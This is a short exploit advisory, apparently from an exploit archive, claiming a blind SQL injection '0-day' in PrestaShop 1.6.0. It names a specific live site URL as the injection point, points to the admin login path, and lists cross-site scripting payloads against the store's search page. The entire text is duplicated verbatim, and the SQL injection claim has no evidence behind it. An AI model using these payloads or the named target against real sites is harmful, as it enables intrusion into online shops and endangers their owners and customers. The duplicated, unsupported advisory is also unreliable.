PrestaShop V1.6.0 Blind Sql Vulnerability 0-Day
===============================================
Author : indoushka
vendor : http://www.prestashop.com/fr/telechargement
Dork : No 4 noob
http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject her)
Login :
path/admin
Cross site scripting :
/index.php?controller=search&tag=bat_213771818860'():;771818860
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
===============================================
Author : indoushka
vendor : http://www.prestashop.com/fr/telechargement
Dork : No 4 noob
http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject her)
Login :
path/admin
Cross site scripting :
/index.php?controller=search&tag=bat_213771818860'():;771818860
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information